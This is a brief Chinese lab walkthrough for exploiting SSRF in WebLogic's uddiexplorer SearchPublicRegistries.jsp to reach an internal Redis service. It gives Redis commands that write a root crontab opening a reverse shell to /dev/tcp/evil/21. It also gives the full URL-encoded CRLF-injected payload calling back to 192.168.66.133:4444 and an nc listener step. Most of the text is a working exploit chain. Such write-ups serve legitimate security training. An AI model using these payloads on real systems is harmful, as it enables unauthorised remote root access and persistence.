SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp
访问一个存在的端口,返回内容
访问一个不存在的端口,返回内容
靶场内docker inspect 容器id,查看redis容器的ip地址
让redis执行命令,利用redis写入定时任务,获取反弹shell
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/evil/21 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save
将命令进行url编码
/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20%27sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.66.133%2F4444%200%3E%261%27%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa
向靶场发送请求
nc监听获取shell